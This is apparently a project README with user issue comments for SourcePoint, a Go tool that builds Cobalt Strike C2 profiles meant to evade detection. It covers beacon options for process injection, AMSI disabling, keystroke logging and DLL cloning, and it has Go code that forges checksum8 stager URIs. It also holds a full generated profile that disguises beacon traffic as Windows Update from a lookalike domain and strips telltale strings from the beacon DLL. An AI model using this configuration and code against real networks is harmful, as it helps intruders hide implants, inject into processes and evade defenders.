SourcePoint is a C2 profile generator for Cobalt Strike command and control servers, designed to aid evasion.

SourcePoint

SourcePoint is a polymorphic C2 profile generator for Cobalt Strike C2s, written in Go. It generates unique C2 profiles on the fly, which reduces reusable Indicators of Compromise ("IoCs") and lets an operator spin up complex profiles with minimal effort. The modifiable features were chosen by extensively reviewing Cobalt Strike articles and release notes to identify the settings that matter most. SourcePoint was designed to make C2 activity harder to detect by moving its IoCs from outright malicious to merely suspicious: a profile whose artifacts are not malicious in nature forces a defender to do additional research before its suspicious nature is discovered. SourcePoint exposes numerous configurable options for shaping a profile; in most cases an option left blank is chosen randomly for you. The generated profiles modify all aspects of your C2. The goal of the project is not only to help circumvent detection-based controls but also to blend C2 traffic and activity into the environment, making that activity hard to spot.

Installation

$ go get gopkg.in/yaml.v2

$ go build SourcePoint.go

Usage

# ./SourcePoint -h

	   _____                            ____        _       __
	  / ___/____  __  _______________  / __ \____  (_)___  / /_
	  \__ \/ __ \/ / / / ___/ ___/ _ \/ /_/ / __ \/ / __ \/ __/
	 ___/ / /_/ / /_/ / /  / /__/  __/ ____/ /_/ / / / / / /_
	/____/\____/\__,_/_/   \___/\___/_/    \____/_/_/ /_/\__/
  							(@Tyl0us)

                                                                                                                        
Usage of ./SourcePoint:
  -Allocation string
        Minimum amount of memory to request for injected content (must be higher than 4096)
  -CDN string
        CDN cookie name (typically used for AzureEdge profiles)
  -CDN-Value string
        CDN cookie value (typically used for AzureEdge profiles)
  -Customuri string
        The base URI for custom HTTP GET/POST profile (default "0")
  -Datajitter string
        Appends a value to HTTP-Get and HTTP-Post server output (default "50")
  -Host string
        Team server domain name
  -Injector string
        Select the preferred method to allocate memory in the remote process:
        [*] VirtualAllocEx (Great for cross architecture i.e x86 -> x64 and x64->x86)
        [*] NtMapViewOfSection (A stealthier option; however, it falls back to VirtualAllocEx, generating more events when it does)
  -Jitter string
        Jitter percentage for beacon call home
  -Keylogger string
        Select the preferred method the beacon will use to log keystrokes: 
        [*] GetAsyncKeyState (Uses GetAsyncKeyState API (Separate DLL for x86/x64 process))
        [*] SetWindowsHookEx (Uses SetWindowsHookEx API)
  -Keystore string
        SSL keystore name
  -Metadata string
        Specifies how to transform and embed metadata into the HTTP request:
        [*] base64
        [*] base64url
        [*] netbios
        [*] netbiosu (default "base64url")
  -Outfile string
        Name of output file
  -PE_Clone string
        PE file beacon will mimic (Use the number):
        [1] srv.dll
        [2] ActivationManager.dll
        [3] audioeng.dll
        [4] AzureSettingSyncProvider.dll
        [5] BingMaps.dll
        [6] BootMenuUX.dll
        [7] DIAGCPL.dll
        [8] FIREWALLCONTROLPANEL.dll
        [9] WMNetMgr.dll
        [10] wwanapi.dll
        [11] Windows.Storage.Search.dll
        [12] Windows.System.Diagnostics.dll
        [13] Windows.System.Launcher.dll
        [14] Windows.System.SystemManagement.dll
        [15] Windows.UI.BioFeedback.dll
        [16] Windows.UI.BlockedShutdown.dll
        [17] Windows.UI.Core.TextInput.dll
        [18] FILEMGMT.dll
        [19] polprocl.dll
        [20] GPSVC.dll
        [21] libcrypto.dll
        [22] rdpcomapi.dll
        [23] winsqlite3.dll
        [24] wow64.dll
        [25] wow64win.dll
        [26] WWANSVC.dll
  -Password string
        SSL certificate password
  -PostEX_Name string
        File Post-Ex activities will spawn and inject into (Use the number):
        [1] WerFault.exe
        [2] WWAHost.exe
        [3] wlanext.exe
        [4] auditpol.exe
        [5] bootcfg.exe
        [6] choice.exe
        [7] bootcfg.exe
        [8] dtdump.exe
        [9] expand.exe
        [10] fsutil.exe
        [11] gpupdate.exe
        [12] gpresult.exe
        [13] logman.exe
        [14] mcbuilder.exe
        [15] mtstocom.exe
        [16] pcaui.exe
        [17] powercfg.exe
        [18] svchost.exe
  -Profile string
        HTTP GET/POST profile (Use the number):
        [1] Windowsupdate
        [2] Slack
        [3] Gotomeeting
        [4] Outlook.Live
        [5] Cloudfront
        [6] AzureEdge
        [7] Custom (Used with ProfilePath)
  -ProfilePath string
        Path of custom HTTP GET/POST profile...
  -Sleep string
        Initial beacon sleep time
  -Stage string
        Disable host staging (Default: False) (default "False")
  -Uri string
        The number of URIs the profile gives beacons to choose from
  -Useragent string
        UserAgent string for the beacon to use (Leave blank to randomly select one):
        [*] Win10Chrome
        [*] Win10Edge
        [*] Win10IE
        [*] Win10
        [*] Win6.3
        [*] Linux
        [*] Mac
  -Yaml string
        Path to the Yaml config file

Important

SourcePoint primarily automates the build process of a profile. It is very important to know every feature these profiles modify; understanding them will greatly increase your chance of success.

Options

While there are many settings and features described in SourcePoint's help output, there are also numerous important features baked into each profile that you should be familiar with. These features are:

Global Options

This part of your profile modifies how the beacon operates. Some of the features used to modify the behaviour are:

  • Host Stage - Allows the team server to host staged shellcode for HTTP, HTTPS and DNS. If this is enabled, anyone who sends a GET request for a URI with the right checksum, such as /9ZXq, can pull the shellcode as well
  • Sleep - The interval between a beacon's call-backs home
  • Jitter - Randomizes the sleep time by up to the given percentage
  • Useragent - The user-agent string used for HTTP and HTTPS traffic. Using a user-agent that matches the environment helps the traffic blend in
  • Data Jitter - Appends a random-length string to all GET and POST server output so that responses are not the same length
  • SMB Frame Header - Adds a header value to SMB beacon messages
  • Pipename - Sets the name of the named pipe the SMB beacon uses for communication
  • Pipename Stager - Sets the name of the named pipe the SMB stager uses
  • TCP Frame Header - Adds a header value to TCP beacon messages
  • SSH Banner - The SSH banner used
  • SSH Pipename - The name of the pipe used for SSH sessions
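Why host staging is worth disabling deserves a closer look. Cobalt Strike's hosted stagers answer any URI whose checksum8 (the 8-bit sum of the characters after the leading "/") equals 92 for the x86 stage or 93 for the x64 stage, which is why a request for /9ZXq pulls shellcode. The code below is an added example written for this page, not part of SourcePoint: it computes that checksum, classifies a request path (usable just as well by a defender scanning web logs), and forges a matching URI from an arbitrary prefix. The sample paths are constructed, and the assumption that the whole remaining path is checksummed is noted in the code.

```go
package main

import (
	"fmt"
	"strings"
)

// Checksum8 targets for Cobalt Strike's hosted stagers: the 8-bit sum of the
// URI characters after the leading "/" is 92 for an x86 stage and 93 for x64.
const (
	ChecksumX86 = 92
	ChecksumX64 = 93
)

// Checksum8 returns the sum of the bytes of s modulo 256.
func Checksum8(s string) int {
	sum := 0
	for i := 0; i < len(s); i++ {
		sum += int(s[i])
	}
	return sum % 256
}

// StagerArch reports whether a request path would be served a hosted stage
// and, if so, which architecture's stage. The leading "/" and any query
// string are dropped before checksumming. Assumption for this example: the
// whole remaining path is checksummed; how the team server treats longer or
// multi-segment paths is not documented on this page.
func StagerArch(path string) (string, bool) {
	path = strings.TrimPrefix(path, "/")
	if i := strings.IndexByte(path, '?'); i >= 0 {
		path = path[:i]
	}
	if path == "" {
		return "", false
	}
	switch Checksum8(path) {
	case ChecksumX86:
		return "x86", true
	case ChecksumX64:
		return "x64", true
	}
	return "", false
}

// ForgeStagerURI appends one alphanumeric character to prefix so that the
// result satisfies the requested checksum. It shows how little effort a
// third party needs to pull a stage when host staging is left enabled.
func ForgeStagerURI(prefix string, target int) (string, bool) {
	const alphabet = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
	base := Checksum8(prefix)
	for i := 0; i < len(alphabet); i++ {
		if (base+int(alphabet[i]))%256 == target {
			return "/" + prefix + string(alphabet[i]), true
		}
	}
	return "", false
}

// Constructed web-log paths (not from a real team server) to classify.
var samplePaths = []string{"/9ZXq", "/aab9", "/index.html"}

func main() {
	for _, p := range samplePaths {
		if arch, ok := StagerArch(p); ok {
			fmt.Printf("%-16s stager request (%s)\n", p, arch)
		} else {
			fmt.Printf("%-16s not a stager URI\n", p)
		}
	}
	if u, ok := ForgeStagerURI("9ZX", ChecksumX86); ok {
		fmt.Println("forged x86 stager URI:", u)
	}
}
```

Run it as-is to see /9ZXq classified as an x86 stager request and /aab9 as x64; point StagerArch at the request paths in your redirector logs to find out who else has been asking for your stage.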

Stage

This part of your profile controls how beacon is loaded into memory and edits the content of the beacon DLL. Some of the features used to modify the behaviour are:

  • Obfuscate - Obfuscates the import table of the reflective DLL
  • Stomppe - Asks the payload to stomp the MZ, PE and e_lfanew values after loading
  • Clean up - Tells the beacon to free the memory associated with the reflective DLL that initialized it
  • Userwx - Set to false so the loaded beacon does not use Read, Write, Execute permissions
  • Smart Inject - Uses embedded function pointer hints to bootstrap the beacon agent without walking the kernel32 export table
  • Sleep Mask - TCP and SMB beacons obfuscate themselves at rest while they wait for a connection to be established
  • PE Header - Changes the characteristics of the beacon reflective DLL so it looks like something else in memory
  • Transformation - Transforms beacon's reflective DLL stage by removing or adding strings in its .rdata section

Process-Inject

This part of your profile controls how the beacon shapes injected content and controls process injection behaviour. Some of the features used to modify the behaviour are:

  • Allocator - Determines how beacon allocates memory in the remote process
  • Minimum Allocation - Minimum amount of memory to request for injected content
  • Userwx - When false, injected content is not left with Read, Write, Execute permissions (RW is used instead)
  • Startrwx - Use Read, Write, Execute as the initial permissions for injected content (the alternative is RW)
  • Transform - Prepends or appends padding to the content beacon injects
  • Execute - This section determines how to execute the injected code

Post-Exec

This part of your profile controls how the beacon handles post-exploitation modules and commands. Some of the features used to modify the behaviour are:

  • Spawnto - Determines the default temporary process beacon spawns for its post-exploitation commands
  • Obfuscate - Obfuscates the post-exploitation DLLs and settles them into memory in a more OPSEC-safe way
  • Smart Inject - Passes key function pointers from beacon to its child jobs
  • AMSI disable - Disables AMSI in powerpick, execute-assembly and psinject (certain EDRs detect this; if one is present it is best to avoid those tools)
  • Keylogger - Determines which API the keystroke logger uses to capture keystrokes

Profiles

Currently SourcePoint provides 6 baked-in HTTP/HTTPS traffic profiles, based on existing profiles. Of these 6, 4 are influenced by and based on:

  • Microsoft Window's Update Communication
  • Slack's Message Communication
  • Gotomeeting's Active Meeting Communication
  • Microsoft Outlook's Email Communication

2 of the profile options (5 and 6) are designed specifically for:

  • Cloudfront.net
  • AzureEdge.net

The last option (7) takes a custom profile. It lets an operator use a completely custom traffic profile: there are many cases where a unique traffic profile will succeed where the built-in ones would not, and it lets operators keep using their go-to profile while still applying SourcePoint's malleability features. Because the profile is yours, you must tweak it so that SourcePoint can fill it in. At a minimum:

  • Replace - header "Host" "acme.com"; with header "Host" "{{.Variables.Host}}";
  • Replace - /pathtolegitpage/ in the http-get uri with {{.Variables.HTTP_GET_URI}}
  • Replace - /pathtolegitpage/ in the http-post uri with {{.Variables.HTTP_POST_URI}}

To do so, pass -Customuri and -ProfilePath along with -Profile 7. While developing a profile, run Cobalt Strike's native ./c2lint against the output to verify that it parses and behaves as expected.
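The placeholder syntax above is Go's text/template, so the substitution can be reproduced outside SourcePoint. The following is an added example written for this page, not SourcePoint's own code: it renders a constructed minimal custom profile carrying the three placeholders and then runs a sanity check over every set uri line before the result goes to c2lint. The Vars struct, its field names, and the sample hostname and URIs are assumptions; the checks mirror two defects users have reported in generated profiles (a URI missing its leading "/" and a URI with a trailing space).

```go
package main

import (
	"bytes"
	"fmt"
	"regexp"
	"strings"
	"text/template"
)

// Vars is the template context assumed for this example. The three fields
// match the placeholders the README asks you to put in a custom profile;
// SourcePoint's real context struct is not shown on this page.
type Vars struct {
	Variables struct {
		Host          string
		HTTP_GET_URI  string
		HTTP_POST_URI string
	}
}

// CustomProfile is a constructed, minimal custom profile in the shape the
// README asks for: the Host header and both uri lines carry placeholders.
const CustomProfile = `http-get {
    set uri "{{.Variables.HTTP_GET_URI}}";
    client {
        header "Host" "{{.Variables.Host}}";
    }
}
http-post {
    set uri "{{.Variables.HTTP_POST_URI}}";
    client {
        header "Host" "{{.Variables.Host}}";
    }
}
`

// Render fills the placeholders with Go's text/template, which is the syntax
// the {{.Variables.X}} markers belong to.
func Render(tmpl, host, getURI, postURI string) (string, error) {
	var v Vars
	v.Variables.Host = host
	v.Variables.HTTP_GET_URI = getURI
	v.Variables.HTTP_POST_URI = postURI
	t, err := template.New("profile").Parse(tmpl)
	if err != nil {
		return "", err
	}
	var out bytes.Buffer
	if err := t.Execute(&out, v); err != nil {
		return "", err
	}
	return out.String(), nil
}

var uriLine = regexp.MustCompile(`set uri\s+"([^"]*)"`)

// CheckURIs is a pre-c2lint sanity check for two defects users have reported
// in generated profiles: a URI without a leading "/" and a URI with trailing
// whitespace. Cobalt Strike accepts several space-separated URIs in one
// set uri string, so each field is checked separately.
func CheckURIs(profile string) []string {
	var problems []string
	for _, m := range uriLine.FindAllStringSubmatch(profile, -1) {
		raw := m[1]
		if raw != strings.TrimSpace(raw) {
			problems = append(problems, fmt.Sprintf("%q has leading or trailing whitespace", raw))
		}
		for _, u := range strings.Fields(raw) {
			if !strings.HasPrefix(u, "/") {
				problems = append(problems, fmt.Sprintf("%q does not start with /", u))
			}
		}
	}
	return problems
}

func main() {
	// Sample values are assumptions for the demonstration.
	out, err := Render(CustomProfile, "acme-email.com", "/owa/", "/owa/mail")
	if err != nil {
		panic(err)
	}
	fmt.Print(out)
	fmt.Println("rendered profile problems:", CheckURIs(out))
	// A uri line in the shape a user reported as broken: no "/" and a trailing space.
	fmt.Println("broken line problems:", CheckURIs(`set uri "sdfghjk ";`))
}
```

CheckURIs is deliberately narrower than c2lint: it only catches the two URI mistakes that c2lint will not flag but that stop a beacon from checking in, so run both.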

Sample Yaml Configs

Stage: "False"
Host: "acme-email.com"
Keystore: "acme-email.com.store"
Password: "Password"
Metadata: "netbios"
Injector: "VirtualAllocEx"
Outfile: "acme.profile"
PE_Clone: 20
Profile: 4
Allocation: 5312
Jitter: 30
Debug: true
Sleep: 35
Uri: 3
Useragent:  "Mac"
Post-EX Processname: 11
Datajitter: 40
Keylogger: "SetWindowsHookEx"
Customuri: 
CDN:
CDN_Value: 
ProfilePath: 

SSL Certificate

Profile modes 1-4 can be used without a valid SSL certificate; SourcePoint will generate a self-signed certificate that matches the profile type. However, a valid SSL certificate is extremely important to the success of any C2. No certificate means the traffic is unencrypted (plain HTTP, which should never be used), and a self-signed certificate comes with its own obvious limitations. There are many ways to obtain a valid SSL certificate and build a keystore from it; my go-to way is a modified version of HTTPsC2DoneRight.sh, created by Cham423.

DNS

DNS customization is not currently offered directly through SourcePoint. To still allow DNS-based beacons, every generated profile contains a commented-out dns-beacon section that you can fill in by hand.

To Do List

  • Add More Profiles
  • DNS Staging
Comments
  • maybe Bug when creating the http.get and http.post URI

    maybe Bug when creating the http.get and http.post URI

    The project (when I used it) creates a valid C2 profile except that the http.get and http.post sections for the uri forget a '/' char and add a space at the end (which is not a bug, just odd)

    for example:

    Example Currently being generated by profile: uri "sdfghjk "

    Example of what I did to fix it on the test generated profile: uri "/sdfghjk"

    This causes beacon to never check in properly with the coded HTTP C2 method for the profile I generated. This can be observed in the web log.

  • [Bug] When specifying self-signed cert, does not write the correct header for

    [Bug] When specifying self-signed cert, does not write the correct header for "https-certificate"

    Everything works great, I love this tool. The only issue is that when you don't specify a keystore for the certificate, the header for the section of "https-certificate" isn't written to the final profile.

    The following command: SourcePoint -Injector VirtualAllocEx -Jitter 21 -Keylogger SetWindowsHookEx -PE_Clone 24 -PostEX_Name 17 -Outfile deez.profile -Host www.bing.com -Profile 2

    Results in the following last 20 lines of the profile

    $ tail -20 deez.profile
    
    header "Cache-Control" "private, no-cache, no-store, must-revalidate";
    header "X-Frame-Options" "SAMEORIGIN";
    header "Vary" "Accept-Encoding";
    header "X-Via" "haproxy-www-suhx";
    
    }
    
    
    }
    
    
    set CN       "www.bing.com"; #Common Name
    set O        "Slack Technologies Inc"; #Organization Name
    set C        "US"; #Country
    set L        "San Francisco"; #Locality
    set OU       "DigiCert Inc"; #Organizational Unit Name
    set ST       "CA"; #State or Province
    set validity "365"; #Number of days the cert is valid for
    }
    

    Note, right about set CN there is no https-certificate { as there should be

  • CS 4.6 Support

    CS 4.6 Support

    https://www.cobaltstrike.com/blog/cobalt-strike-4-6-the-line-in-the-sand/

    Execute-assembly 1MB Limit Increase

    A number of users have been asking for this for quite some time, and the change that we made affect not only execute-assembly, but other tasks (eg. dllinject) as well. We have added three new settings to the Malleable C2 profile (tasks_max_size, tasks_proxy_max_size and tasks_dns_proxy_max_size) that can be used to control maximum size limits. Note that these settings need to be set prior to team server startup. If the size is increased at a later time, old artifacts will still use the previous size settings and tasks that are too large will be rejected.

  • Staging Disabled In Profile

    Staging Disabled In Profile

    This is from the latest version of Cobalt Strike, downloaded today. Quite possibly user error but I'd appreciate any insights you could provide.

    Generating Profile:

    ┌──(kali㉿kali)-[~/Desktop/SourcePoint-main]
    └─$ ./SourcePoint -Injector NtMapViewOfSection -Host 0012eb.lwindowsupdate.com -Jitter 20 -Outfile teststage2.profile -Stage True -PE_Clone 12 -PostEX_Name 11 -Profile 1 -Useragent Win10Chrome

           _____                            ____        _       __ 
          / ___/____  __  _______________  / __ \____  (_)___  / /_
          \__ \/ __ \/ / / / ___/ ___/ _ \/ /_/ / __ \/ / __ \/ __/
         ___/ / /_/ / /_/ / /  / /__/  __/ ____/ /_/ / / / / / /_  
        /____/\____/\__,_/_/   \___/\___/_/    \____/_/_/ /_/\__/  
                                                        (@Tyl0us)
    

    [*] Preparing Varibles...
    [*] Building Profile...
    [!] Host Staging Is Enabled - Staged Payloads Are Available But Your Beacon Payload Is Available To Anyone That Connects To Your Server To Request It
    [*] Post-Ex Process Name: gpupdate.exe
    [*] Seleted Profile: WindowsUpdate
    [+] Profile Generated: teststage2.profile
    [+] Happy Hacking

    Starting CS says

    ┌──(kali㉿kali)-[~/Desktop/cs-1/cobaltstrike]
    └─$ sudo ./teamserver 192.168.2.200 password ./teststage2.profile
    [*] Will use existing X509 certificate and keystore (for SSL)
    [+] I see you're into threat replication. ./teststage2.profile loaded.
    [*] Loading properties file (/home/kali/Desktop/cs-1/cobaltstrike/TeamServer.prop).
    [!] Properties file (/home/kali/Desktop/cs-1/cobaltstrike/TeamServer.prop) was not found.
    [!] Woah! Your profile disables hosted payload stages. Payload staging won't work.
    [+] Team server is up on 0.0.0.0:50050
    [*] SHA256 hash of SSL cert is:

    Output from teststage2.profile

    set host_stage "True";
    set sleeptime "44000";
    set jitter "20";
    set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36";

    set data_jitter "50";
    set smb_frame_header "";
    set pipename "plugplay+3850";
    set pipename_stager "plugplay+1395";

    set tcp_frame_header "";
    set ssh_banner "Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-1029-aws x86_64)";
    set ssh_pipename "plugplay+##";

    ####Manaully add these if your doing C2 over DNS (Future Release)####
    ##dns-beacon {
    set dns_idle "1.2.3.4";
    set dns_max_txt "199";
    set dns_sleep "1";
    set dns_ttl "5";
    set maxdns "200";
    set dns_stager_prepend "doc-stg-prepend";
    set dns_stager_subhost "doc-stg-sh.";
    set beacon "doc.bc.";
    set get_A "doc.1a.";
    set get_AAAA "doc.4a.";
    set get_TXT "doc.tx.";
    set put_metadata "doc.md.";
    set put_output "doc.po.";
    set ns_response "zero";
    #}

    stage {
    set obfuscate "true";
    set stomppe "true";
    set cleanup "true";
    set userwx "false";
    set smartinject "true";

    #TCP and SMB beacons will obfuscate themselves while they wait for a new connection.
    #They will also obfuscate themselves while they wait to read information from their parent Beacon.
    set sleep_mask "true";

    set checksum "0";
    set compile_time "05 Jun 2028 09:16:06";
    set entry_point "229200";
    set image_size_x86 "397312";
    set image_size_x64 "397312";
    set name "Windows.System.Diagnostics.dll";
    set rich_header "\x56\xb8\x3f\x82\x12\xd9\x51\xd1\x12\xd9\x51\xd1\x12\xd9\x51\xd1\x1b\xa1\xc2\xd1\x7b\xd9\x51\xd1\x49\xb1\x55\xd0\x19\xd9\x51\xd1\x49\xb1\x52\xd0\x11\xd9\x51\xd1\x49\xb1\x54\xd0\x0c\xd9\x51\xd1\x12\xd9\x50\xd1\x0f\xdc\x51\xd1\x49\xb1\x50\xd0\x1a\xd9\x51\xd1\x49\xb1\x51\xd0\x13\xd9\x51\xd1\x49\xb1\x58\xd0\x3f\xd9\x51\xd1\x49\xb1\xac\xd1\x13\xd9\x51\xd1\x49\xb1\xae\xd1\x13\xd9\x51\xd1\x49\xb1\x53\xd0\x13\xd9\x51\xd1\x52\x69\x63\x68\x12\xd9\x51\xd1\x00\x00\x00\x00\x00\x00\x00\x00";

    transform-x86 {
    	prepend "\x90\x90\x90"; # NOP, NOP!
    	strrep "ReflectiveLoader" "";
    	strrep "This program cannot be run in DOS mode" "";
    	strrep "NtQueueApcThread" "";
    	strrep "IsWow64Process" "";
    	strrep "HTTP/1.1 200 OK" "";
    	strrep "Stack memory was corrupted" "";
    	strrep "kernel32" "";
    	strrep "beacon.dll" "";
    	strrep "KERNEL32.dll" "";
    	strrep "ADVAPI32.dll" "";
    	strrep "WININET.dll" "";
    	strrep "WS2_32.dll" "";
    	strrep "DNSAPI.dll" "";
    	strrep "Secur32.dll" "";
    	strrep "VirtualProtectEx" "";
    	strrep "VirtualProtect" "";
    	strrep "VirtualAllocEx" "";
    	strrep "VirtualAlloc" "";
    	strrep "VirtualFree" "";
    	strrep "VirtualQuery" "";
    	strrep "RtlVirtualUnwind" "";
    	strrep "sAlloc" "";
    	strrep "FlsFree" "";
    	strrep "FlsGetValue" "";
    	strrep "FlsSetValue" "";
    	strrep "InitializeCriticalSectionEx" "";
    	strrep "CreateSemaphoreExW" "";
    	strrep "SetThreadStackGuarantee" "";
    	strrep "CreateThreadpoolTimer" "";
    	strrep "SetThreadpoolTimer" "";
    	strrep "WaitForThreadpoolTimerCallbacks" "";
    	strrep "CloseThreadpoolTimer" "";
    	strrep "CreateThreadpoolWait" "";
    	strrep "SetThreadpoolWait" "";
    	strrep "CloseThreadpoolWait" "";
    	strrep "FlushProcessWriteBuffers" "";
    	strrep "FreeLibraryWhenCallbackReturns" "";
    	strrep "GetCurrentProcessorNumber" "";
    	strrep "GetLogicalProcessorInformation" "";
    	strrep "CreateSymbolicLinkW" "";
    	strrep "SetDefaultDllDirectories" "";
    	strrep "EnumSystemLocalesEx" "";
    	strrep "CompareStringEx" "";
    	strrep "GetDateFormatEx" "";
    	strrep "GetLocaleInfoEx" "";
    	strrep "GetTimeFormatEx" "";
    	strrep "GetUserDefaultLocaleName" "";
    	strrep "IsValidLocaleName" "";
    	strrep "LCMapStringEx" "";
    	strrep "GetCurrentPackageId" "";
    	strrep "UNICODE" "";
    	strrep "UTF-8" "";
    	strrep "UTF-16LE" "";
    	strrep "MessageBoxW" "";
    	strrep "GetActiveWindow" "";
    	strrep "GetLastActivePopup" "";
    	strrep "GetUserObjectInformationW" "";
    	strrep "GetProcessWindowStation" "";
    	strrep "Sunday" "";
    	strrep "Monday" "";
    	strrep "Tuesday" "";
    	strrep "Wednesday" "";
    	strrep "Thursday" "";
    	strrep "Friday" "";
    	strrep "Saturday" "";
    	strrep "January" "";
    	strrep "February" "";
    	strrep "March" "";
    	strrep "April" "";
    	strrep "June" "";
    	strrep "July" "";
    	strrep "August" "";
    	strrep "September" "";
    	strrep "October" "";
    	strrep "November" "";
    	strrep "December" "";
    	strrep "MM/dd/yy" "";
    	strrep "Stack memory around _alloca was corrupted" "";
    	strrep "Unknown Runtime Check Error" "";
    	strrep "Unknown Filename" "";
    	strrep "Unknown Module Name" "";
    	strrep "Run-Time Check Failure #%d - %s" "";
    	strrep "Stack corrupted near unknown variable" "";
    	strrep "Stack pointer corruption" "";
    	strrep "Cast to smaller type causing loss of data" "";
    	strrep "Stack memory corruption" "";
    	strrep "Local variable used before initialization" "";
    	strrep "Stack around _alloca corrupted" "";
    	strrep "RegOpenKeyExW" "";
    	strrep "egQueryValueExW" "";
    	strrep "RegCloseKey" "";
    	strrep "LibTomMath" "";
    	strrep "Wow64DisableWow64FsRedirection" "";
    	strrep "Wow64RevertWow64FsRedirection" "";
    	strrep "Kerberos" "";
    
    	}
    
    transform-x64 {
    	prepend "\x90\x90\x90"; # NOP, NOP!
    	strrep "ReflectiveLoader" "";
    	strrep "This program cannot be run in DOS mode" "";
    	strrep "beacon.x64.dll" "";
    	strrep "NtQueueApcThread" "";
    	strrep "IsWow64Process" "";
    	strrep "HTTP/1.1 200 OK" "";
    	strrep "Stack memory was corrupted" "";
    	strrep "kernel32" "";
    	strrep "beacon.dll" "";
    	strrep "KERNEL32.dll" "";
    	strrep "ADVAPI32.dll" "";
    	strrep "WININET.dll" "";
    	strrep "WS2_32.dll" "";
    	strrep "DNSAPI.dll" "";
    	strrep "Secur32.dll" "";
    	strrep "VirtualProtectEx" "";
    	strrep "VirtualProtect" "";
    	strrep "VirtualAllocEx" "";
    	strrep "VirtualAlloc" "";
    	strrep "VirtualFree" "";
    	strrep "VirtualQuery" "";
    	strrep "RtlVirtualUnwind" "";
    	strrep "sAlloc" "";
    	strrep "FlsFree" "";
    	strrep "FlsGetValue" "";
    	strrep "FlsSetValue" "";
    	strrep "InitializeCriticalSectionEx" "";
    	strrep "CreateSemaphoreExW" "";
    	strrep "SetThreadStackGuarantee" "";
    	strrep "CreateThreadpoolTimer" "";
    	strrep "SetThreadpoolTimer" "";
    	strrep "WaitForThreadpoolTimerCallbacks" "";
    	strrep "CloseThreadpoolTimer" "";
    	strrep "CreateThreadpoolWait" "";
    	strrep "SetThreadpoolWait" "";
    	strrep "CloseThreadpoolWait" "";
    	strrep "FlushProcessWriteBuffers" "";
    	strrep "FreeLibraryWhenCallbackReturns" "";
    	strrep "GetCurrentProcessorNumber" "";
    	strrep "GetLogicalProcessorInformation" "";
    	strrep "CreateSymbolicLinkW" "";
    	strrep "SetDefaultDllDirectories" "";
    	strrep "EnumSystemLocalesEx" "";
    	strrep "CompareStringEx" "";
    	strrep "GetDateFormatEx" "";
    	strrep "GetLocaleInfoEx" "";
    	strrep "GetTimeFormatEx" "";
    	strrep "GetUserDefaultLocaleName" "";
    	strrep "IsValidLocaleName" "";
    	strrep "LCMapStringEx" "";
    	strrep "GetCurrentPackageId" "";
    	strrep "UNICODE" "";
    	strrep "UTF-8" "";
    	strrep "UTF-16LE" "";
    	strrep "MessageBoxW" "";
    	strrep "GetActiveWindow" "";
    	strrep "GetLastActivePopup" "";
    	strrep "GetUserObjectInformationW" "";
    	strrep "GetProcessWindowStation" "";
    	strrep "Sunday" "";
    	strrep "Monday" "";
    	strrep "Tuesday" "";
    	strrep "Wednesday" "";
    	strrep "Thursday" "";
    	strrep "Friday" "";
    	strrep "Saturday" "";
    	strrep "January" "";
    	strrep "February" "";
    	strrep "March" "";
    	strrep "April" "";
    	strrep "June" "";
    	strrep "July" "";
    	strrep "August" "";
    	strrep "September" "";
    	strrep "October" "";
    	strrep "November" "";
    	strrep "December" "";
    	strrep "MM/dd/yy" "";
    	strrep "Stack memory around _alloca was corrupted" "";
    	strrep "Unknown Runtime Check Error" "";
    	strrep "Unknown Filename" "";
    	strrep "Unknown Module Name" "";
    	strrep "Run-Time Check Failure #%d - %s" "";
    	strrep "Stack corrupted near unknown variable" "";
    	strrep "Stack pointer corruption" "";
    	strrep "Cast to smaller type causing loss of data" "";
    	strrep "Stack memory corruption" "";
    	strrep "Local variable used before initialization" "";
    	strrep "Stack around _alloca corrupted" "";
    	strrep "RegOpenKeyExW" "";
    	strrep "egQueryValueExW" "";
    	strrep "RegCloseKey" "";
    	strrep "LibTomMath" "";
    	strrep "Wow64DisableWow64FsRedirection" "";
    	strrep "Wow64RevertWow64FsRedirection" "";
    	strrep "Kerberos" "";
    	}
    

    }

    process-inject {
    # set remote memory allocation technique
    set allocator "NtMapViewOfSection";

    # shape the content and properties of what we will inject
    set min_alloc "9457";
    set userwx    "false";
    set startrwx "true";
    
    transform-x86 {
        prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # NOP, NOP!
    }
    
    transform-x64 {
        prepend "\x90\x90\x90\x90\x90\x90\x90\x90\x90"; # NOP, NOP!
    }
    
    # specify how we execute code in the remote process
    execute {
    	CreateThread "ntdll.dll!RtlUserThreadStart+0x2302";
        NtQueueApcThread-s;
        SetThreadContext;
        CreateRemoteThread;
    	CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
        RtlCreateUserThread;
    }
    

    }

    post-ex {
    # control the temporary process we spawn to
    set spawnto_x86 "%windir%\syswow64\gpupdate.exe";
    set spawnto_x64 "%windir%\sysnative\gpupdate.exe";

    # change the permissions and content of our post-ex DLLs
    set obfuscate "true";
    
    # pass key function pointers from Beacon to its child jobs
    set smartinject "true";
    
    # disable AMSI in powerpick, execute-assembly, and psinject
    set amsi_disable "true";
    
    # control the method used to log keystrokes 
    set keylogger "SetWindowsHookEx";
    

    }

    http-get {
    set uri "/c/msdownload/update/others/2019/12/7jJw9JrTrLDNfSeO3i ";

    client {

    header "Accept" "*/*";
    header "Host" "0012eb.lwindowsupdate.com";
    
    metadata {
    	base64url;
    	append ".cab";
    	uri-append;
    }
    

    }

    server {
    header "Content-Type" "application/vnd.ms-cab-compressed";
    header "Server" "Microsoft-IIS/8.5";
    header "MSRegion" "N. America";
    header "Connection" "keep-alive";
    header "X-Powered-By" "ASP.NET";

    output {
    
    	print;
    }
    

    }
    }

    http-post {
    set uri "/c/msdownload/update/others/2019/12/b4v2CKdyaMF33ftBarW-faotz ";
    set verb "GET";

    client {

    header "Accept" "*/*";
    
    
    id {
    	prepend "download.windowsupdate.com/c/";
    	header "Host";
    }
    
    
    output {
    	base64url;
    	append ".cab";
    	uri-append;
    }
    

    }

    server {
    header "Content-Type" "application/vnd.ms-cab-compressed";
    header "Server" "Microsoft-IIS/8.5";
    header "MSRegion" "N. America";
    header "Connection" "keep-alive";
    header "X-Powered-By" "ASP.NET";

    output {
    	print;
    }
    

    }
    }

    http-stager {
    server {
    header "Content-Type" "application/vnd.ms-cab-compressed";
    }
    }

    https-certificate {
    set CN "0012eb.lwindowsupdate.com"; #Common Name
